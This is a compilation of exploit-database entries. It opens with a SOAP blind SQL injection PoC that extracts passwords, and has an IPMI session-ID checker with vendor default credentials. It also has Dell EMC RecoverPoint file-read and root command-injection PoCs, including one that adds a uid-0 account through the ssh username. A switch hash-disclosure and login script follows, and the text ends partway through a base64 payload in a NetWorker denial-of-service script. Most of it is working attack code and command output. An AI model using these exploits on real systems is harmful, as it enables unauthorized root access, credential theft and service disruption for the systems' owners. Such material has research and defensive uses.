         <macAddress xsi:type="xsd:string">' or '1'='1</macAddress>
         <filename xsi:type="xsd:string">test</filename>
      </urn:getUploadPath>
   </soapenv:Body>
</soapenv:Envelope>
Page: /service/kbot_service.php
Web method: getKBot
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: www.example.com
Content-Type: text/xml;charset=UTF-8
SOAPAction: "urn:#getKBot"
Content-Length: 553

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:getKBotConfig soapenv:encodingStyle="http://example.xmlsoap.org/soap/encoding/">
         <macAddress xsi:type="xsd:string">' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''='</macAddress>
      </urn:getKBotConfig>
   </soapenv:Body>
</soapenv:Envelope>
The following pages also appear to be affected by similar SQL injection weaknesses, however require authentication:
Page: /userui/advisory_detail.php
PoC: http://www.example.com/userui/advisory_detail.php?ID=9-2
Notes: Requires Authentication
Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID
Parameter: ORDER[]
Notes: Requires Authentication
Page: /userui/ticket.php?ID=86
Parameter: ID
Notes: Requires Authentication
HireHackking 
"""
For testing purposes only.

(c) Yong Chuan, Koh 2014
"""

from time import sleep
from socket import *
from struct import *
from random import *
import sys, os, argparse 

HOST = None
PORT = 623

bufsize = 1024
recv = ""


# create socket
UDPsock = socket(AF_INET,SOCK_DGRAM)
UDPsock.settimeout(2)

data = 21	#offset of data start

RMCP = ('\x06' + 	#RMCP.version = ASF RMCP v1.0
	'\x00' +	#RMCP.reserved
	'\xFF' +	#RMCP.seq
	'\x07'		#RMCP.Type/Class = Normal_RMCP/IPMI
	)



def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None):
	auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}

	sess_header = ''
	sess_header += pack('<B', auth_types[auth_type])
	sess_header += pack('<L', seq_num)
	sess_header += pack('<L', sess_id)
	if auth_type is not 'None':
		raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd
		import hashlib
		h = hashlib.md5(raw)
		sess_header += h.digest()
	sess_header += pack('B', len(ipmi))
			
	return sess_header


class CreateIPMI ():
	def __init__ (self):
		self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 }
		self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'}
		self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}

	def CheckSum (self, bytes):

		chksum = 0
		q = ''
		for i in bytes:
			q += '%02X ' %ord(i)
			chksum = (chksum + ord(i)) % 0x100
		if chksum > 0:
			chksum = 0x100 - chksum

		return pack('>B', chksum)


	def Header (self, cmd, seq_num=0x00):
		#only for IPMI v1.5
		cmds = {'Get Channel Auth Capabilities'	: (0x06, 0x38), #(netfn, cmd_code)
			'Get Session Challenge'		: (0x06, 0x39), 
			'Activate Session'		: (0x06, 0x3a),
			'Set Session Privilege Level'	: (0x06, 0x3b),
			'Close Session'			: (0x06, 0x3c),
			'Set User Access'		: (0x06, 0x43),
			'Get User Access'		: (0x06, 0x44),
			'Set User Name'			: (0x06, 0x45),
			'Get User Name'			: (0x06, 0x46),
			'Set User Password'		: (0x06, 0x47),
			'Get Chassis Status'		: (0x00, 0x01)}
		ipmi_header = ''
		ipmi_header += pack('<B', 0x20)			#target addr
		ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) 	#netfn | target lun
		ipmi_header += self.CheckSum (ipmi_header)
		ipmi_header += pack('<B', 0x81)			#source addr
		ipmi_header += pack('<B', seq_num<<2 | 0)	#seq_num | source lun
		ipmi_header += pack('<B', cmds[cmd][1])		#IPMI message command

		return ipmi_header


	def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'):
		ipmi = ''
		ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq)
		ipmi += pack('<B', 0<<7 | chn)			#IPMI v1.5 | chn num (0-7, 14=current_chn, 15)
		ipmi += pack('<B', self.priv_lvls[priv_lvl])	#requested privilege level
		ipmi += self.CheckSum (ipmi[3:])
		
		return ipmi


	def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'):
		#only for IPMI v1.5
		ipmi = ''
		ipmi += self.Header('Get Session Challenge', hdr_seq)
		ipmi += pack('<B', self.auth_types[auth_type])	#authentication type
		ipmi += username				#user name
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'):
		#only for IPMI v1.5	
		ipmi = ''
		ipmi += self.Header('Activate Session', hdr_seq)
		ipmi += pack('>B', self.auth_types[auth_type])
		ipmi += pack('>B', self.priv_lvls[priv_lvl])
		ipmi += authcode		#challenge string
		ipmi += pack('<L', 0xdeadb0b0)	#initial outbound seq num
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'):
		#only for IPMI v1.5
		ipmi = ''
		ipmi += self.Header('Set Session Privilege Level', hdr_seq)
		ipmi += pack('>B', self.priv_lvls[priv_lvl])
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def CloseSession (self, hdr_seq, sess_id):
		ipmi = ''
		ipmi += self.Header ("Close Session", hdr_seq)
		ipmi += pack('<L', sess_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetChassisStatus (self, hdr_seq):
		ipmi = ''
		ipmi += self.Header ("Get Chassis Status", hdr_seq)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetUserAccess (self, hdr_seq, user_id, chn_num=0x0E):
		ipmi = ''
		ipmi += self.Header ("Get User Access", hdr_seq)
		ipmi += pack('>B', chn_num)		#chn_num = 0x0E = current channel
		ipmi += pack('>B', user_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetUserName (self, hdr_seq, user_id=2):
		ipmi = ''
		ipmi += self.Header ("Get User Name", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserName (self, hdr_seq, user_id, user_name):
		#Assign user_name to user_id, replaces if user_id is occupied
		ipmi = ''
		ipmi += self.Header ("Set User Name", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += user_name.ljust(16, '\x00')
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserPassword (self, hdr_seq, user_id, password, op='set password'):
		ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3}
		ipmi = ''
		ipmi += self.Header ("Set User Password", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += pack('>B', ops[op])
		ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E):
		ipmi = ''
		ipmi += self.Header ("Set User Access", hdr_seq)
		ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn)	#bit4=1=enable user for IPMI Messaging | chn=0xE=current channel
		ipmi += pack('>B', user_id)
		ipmi += pack('>B', self.priv_lvls[new_priv])
		ipmi += pack('>B', 0)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


def SendUDP (pkt):

	global HOST, PORT, data

	res = ''
	code = ipmi_seq = 0xFFFF
	for i in range(5):
		try:
			UDPsock.sendto(pkt, (HOST, PORT))
			res = UDPsock.recv(bufsize)
		except Exception as e:
			print '[-] Socket Timeout: Try %d'%i
			sleep (0)
		else:
			#have received a reply
			if res[4:5] == '\x02':		#Session->AuthType = MD5
				data += 16
			code 	= unpack('B',res[data-1:data])[0]
			ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2
			if res[4:5] == '\x02':
				data -= 16
			break
	return code, ipmi_seq, res


def SetUpSession (username, pwd, priv='Admin', auth='MD5'):

	global data

	#Get Channel Authentication Capabilities
	ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
	if code != 0x00:
		return code, 0, 0, 0
	#print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq)


	#Get Session Challenge
	ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5')
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
	if code != 0x00:
                if code == 0xFFFF:
                        print "[-] BMC didn't respond to IPMI v1.5 session setup"
                        print "    If firmware had disabled it, then BMC is not vulnerable"
		return code, 0, 0, 0
	temp_sess_id 	= unpack('<L', res[data:data+4])[0]
	challenge_str 	= res[data+4:data+4+16]
	#print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq)


	#Activate Session
	ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi)
	if code != 0x00:
		return code, 0, 0, 0
	data += 16
	sess_auth_type 			= unpack('B', res[data:data+1])[0]
	sess_id 			= unpack('<L', res[data+1:data+1+4])[0]
	ini_inbound = sess_hdr_seq 	= unpack('<L', res[data+5:data+5+4])[0]
	sess_priv_lvl 			= unpack('B', res[data+9:data+9+1])[0]
	#print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq)
	#print '   %-30s: Session_ID %08X'%sess_id
	data -= 16


	#Set Session Privilege Level
	ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi)
	sess_hdr_seq += 1
	if code != 0x00:
		return code, 0, 0, 0
	new_priv_lvl = unpack('B', res[data:data+1])[0]
	#print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq)


	return code, temp_sess_id, sess_hdr_seq, sess_id
	

def CloseSession (sess_seq, sess_id):

	global data

	#Close Session
	ipmi = CreateIPMI().CloseSession(5, sess_id)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
	#print '[+]%-30s: %02X (%d)'%('Close Session', code, ipmi_seq)

	return code


def CheckSessionAlive(sess_seq, sess_id):
	#SetUserPassword(): "user enable <user_id>"
	ipmi = CreateIPMI().GetChassisStatus(31)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
	print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq)
	sess_seq += 1
	
	return sess_seq





def banner():
        print ("######################################################\n"+\
               "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\
               "## (http://www.kb.cert.org/vuls/id/843044)\n"+\
               "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\
               "## and checking that these values are incremental\n"+\
               "## \n"+\
               "## Author:  Yong Chuan, Koh\n"+\
               "## Email:   yongchuan.koh@mwrinfosecurity.com\n"+\
               "## (c) Yong Chuan, Koh 2014\n"+\
               "######################################################\n")


def main():

        banner()
        
        #default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi)
        vendors = {"HP"         :{"user":"Administrator",       "pwd":""},     #no default pwd: <factory randomized 8-character string>
                   "DELL"       :{"user":"root",                "pwd":"calvin"},
                   "IBM"        :{"user":"USERID",              "pwd":"PASSW0RD"},
                   "FUJITSU"    :{"user":"admin",               "pwd":"admin"},
                   "SUPERMICRO" :{"user":"ADMIN",               "pwd":"ADMIN"},
                   "ORACLE"     :{"user":"root",                "pwd":"changeme"},
                   "ASUS"       :{"user":"admin",               "pwd":"admin"}
                   }
        
        arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values")
        arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server")
        arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)")
        arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)")
        arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)")
        arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)")

        args = arg.parse_args()

        if args.vendor is not None: args.vendor = args.vendor.upper()
        if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None):
                print "[-] Error: -n and -p are required because -v is not specified/in default list"
                print "    Vendors with Default Accounts"
                print "    -----------------------------------"
                for vendor,acct in vendors.iteritems():
                        print "    %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"])
                sys.exit(1)
        
        if args.username is None:   args.username = vendors[args.vendor]["user"].ljust(16, '\x00')
        if args.password is None:   args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00')


        global HOST, PORT
        HOST = args.ip  
        PORT = args.udpport

        print "Script Parameters"
        print "-------------------------"
        print "IP       : %s"%HOST                        
        print "Port     : %d"%PORT
        print "Username : %s"%args.username
        print "Password : %s"%args.password

        session_ids = []
        for i in xrange(0x80):  #do not go beyond 0xFF, because of how session_ids is checked for incremental later
                try:
                        code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5')
                        if code == 0:
                                session_ids.append(temp_sess_id)
                                session_ids.append(sess_id)
                                print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id)
                        else:
                                #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i)
                                sleep(5)
                                continue


                        code = CloseSession (sess_seq, sess_id)
                        if code == 0:
                                #print '[+%04X] Close Session OK'%(i)
                                i += 1
                                sleep (0.5)
                        else:
                                #print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i)
                                sleep(65)

                except Exception as e:
                        exc_type, exc_obj, exc_tb = sys.exc_info()
                        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                        print (exc_type, fname, exc_tb.tb_lineno)


        session_ids = session_ids[:0xFF]
        
        #get the first incremental diff
        const_diff = None
        for i in xrange(1, len(session_ids)):
                if session_ids[i-1] < session_ids[i]:
                        const_diff = session_ids[i] - session_ids[i-1]
                        break
        #check if session_ids are increasing at a fixed value
        vulnerable = True
        crossed_value_boundary = 0
        for i in xrange(1, len(session_ids)):

                if session_ids[i]-session_ids[i-1] != const_diff:
                        if crossed_value_boundary < 2:
                                crossed_value_boundary += 1
                        else:
                                vulnerable = False

        if vulnerable:
                print "Conclusion: BMC is vulnerable to CVE-2014-8272"
        else:
                print "Conclusion: BMC is not vulnerable to CVE-2014-8272"

        
        



if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: N/A
 
# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.
 
# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd 127.0.0.1

test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd 127.0.0.1
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
<SNIP>
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280
HireHackking 
# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution
# Date: 2018-06-21
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Exploit Author: Paul Taylor
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
 
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames 
# which are presented for authentication, allowing unauthenticated root access via 
# the ssh service.
 
# 2. Proof of Concept
# Inject into ssh username.
# N.B. combined length of new username+password is limited to 21 due to injection length limitations

$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3
Password: ^C
$ ssh bao7uo@192.168.57.3
Password: Secret123
Could not chdir to home directory /home/bao7uo: No such file or directory
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#
HireHackking 
# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution
# Date: 2018-06-21
# Exploit Author: Paul Taylor
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
 
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames 
# which are presented for authentication, allowing unauthenticated root access 
# via tty console login.
 
# 2. Proof of Concept
# Inject into local tty console login prompt

recoverpoint login: $(bash > &2)
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#
HireHackking 
# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and  Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability>
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos


# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle


# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle


import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) < 3:
    print("Usage: python cve-2019-15993.py URL passwordfile")
    sys.exit()

url = sys.argv[1]
file = sys.argv[2]

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def hash_value(value):
    """Calculate the SHA1 hash of a value."""
    sha1 = hashlib.sha1()
    sha1.update(value.encode('utf-8'))
    return sha1.hexdigest()

def userName_parser(text, start_delimiter, end_delimiter):
    results = []
    iteration = 0
    start = 0
    while start >= 0:
        start = text.find(start_delimiter, start)
        if start >= 0:
            start += len(start_delimiter)
            end = text.find(end_delimiter, start)
            if end >= 0:
                results.append(text[start:end])
                start = end + len(end_delimiter)

                iteration = iteration + 1
    return results

# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)

# Read in the values from the file
with open(file, 'r') as f:
    values = f.readlines()

values = [value.strip() for value in values]
hashes = {hash_value(value): value for value in values}

if response.status_code == 302:
    print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
    url = response.headers["Location"] + "config/device/adminusersetting"
    response=requests.get(url, verify=False)

    if response.status_code == 200:
        print("[*] Successful request to URL:", url + "\n")
        content = response.text
        users_names = userName_parser(content,"<userName>","</userName>")
        sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)

        print("SHA1 Hashes found:\n")

        loops = 0
        while loops < len(sha1_hashes):
            print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")


            for sha1_hash in sha1_hashes:
                if sha1_hash in hashes:
                     print("Match:", sha1_hash, hashes[sha1_hash])
                     print("\nTesting Credentials via API.\n\n")
                     payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])

                     response_login = requests.get(payload, allow_redirects=False, verify=False)
                     headers = response_login.headers
                     if "sessionID" in headers:
                          print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
                          print(headers["sessionID"])
                     else:
                          print("Unable to sign in.")
            loops = loops + 1
    else:
        print("Host is not vulnerable:", response.status_code)






[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]
    Ken Pyle
    M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
    Main: 267-540-3337
    Direct: 484-498-8340
    Email: kp@cybir.com
    Website: www.cybir.com
HireHackking 
'''
# Exploit Title: Dell EMC NetWorker DoS PoC
# Date: 18.03.2018
# Exploit Author: Marek Cybul
# Vendor Homepage: https://www.emc.com/data-protection/networker.htm
# Versions:

Dell EMC NetWorker versions prior to 9.2.1.1
Dell EMC NetWorker versions prior to 9.1.1.6
Dell EMC NetWorker 9.0.x
Dell EMC NetWorker versions prior to 8.2.4.11

# Tested on: 8.2.1.2.Build.764 and 9.1.0.4.Build.82 RHEL7


# CVE : CVE-2018-1218
http://seclists.org/fulldisclosure/2018/Mar/43
'''

#!/usr/bin/python


import sys, base64, socket, time

scan = False
if len(sys.argv) < 2:
    print "USAGE: ./emc_networker_dos.py <addr> <nsrd_port>"
    sys.exit(1)
elif len(sys.argv) == 2:
    nsrd_addr = str(sys.argv[1])
    print "[i] Scanning for active nsrd service..."
    nsrd_port = 0
else:
    nsrd_addr = str(sys.argv[1])
    nsrd_port = int(sys.argv[2])



part1 = """gAABBEoWuaoAAAAAAAAAAgAF890AAAACAAAAaAAAdT0AAAAIAAAAAVoVhWQAAAAAAAAAAAAAAAEA
AABhY3Rpb24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
AAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAF
TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEA
AAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgA
AAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01v
bnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QA
AAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAA
BG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAA
AAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAAB
cwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUA
AAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAA
AAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAA
AAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9u
dGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAA
B01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJp
b2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAAB
AAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwA
AAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEA
AAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJp
ZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAA
AQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
